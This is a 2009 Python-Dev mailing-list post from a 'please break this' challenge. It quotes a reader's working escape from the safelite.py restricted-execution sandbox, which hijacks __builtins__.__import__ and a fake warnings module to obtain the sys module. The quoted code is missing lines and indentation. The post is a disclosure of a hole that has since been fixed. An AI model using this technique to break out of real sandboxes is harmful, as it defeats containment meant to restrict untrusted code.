[Python-Dev] Challenge: Please break this! [Now with blog post]
tav at espians.com
Tue Feb 24 09:27:01 CET 2009
Daniel emailed in the exploit below and it is pretty devastating. It
takes advantage of the fact that the warnings framework in 2.6+
dynamically imports modules without being explicitly called!!
I've fixed this hole in safelite.py, but would be interested to know
if there are other non-user-initiated dynamically imported modules?
Thanks Daniel for bringing this to our attention!
On Tue, Feb 24, 2009 at 4:46 AM, Daniel (ajax) Diniz <ajaksu at gmail.com> wrote:
> Here's my attempt. Uses the builtin warnings module.You might need to
> change 'args' to 'args' depending on your environment.
> I really don't like to post these to public MLs, but feel free to do
> so if you think no harm may arise from this one ;)
> from safelite import FileReader
> # Let's build a fake module
> warnings = __builtins__.__class__('warnings')
> # Fill it with deception
> warnings.default_action = "ignore"
> # And provide a supporting thug
> def __import__(*args):
> print "How nice:\n", args.keys()
> global sys
> sys = args['sys']
> except Exception, v:
> print "Exception:", v
> return warnings
> # Put the bogus module at the doorstep...
> __builtins__.warnings = warnings
> # and have the thug replacing the doorman
> __builtins__.__import__ = __import__
> # An unsuspecting costumer passes by...
> # ... and is brutally mugged :)
> print sys
> print dir(sys)
plex:espians/tav | tav at espians.com | +44 (0) 7809 569 369
http://tav.espians.com | http://twitter.com/tav | skype:tavespian
More information about the Python-Dev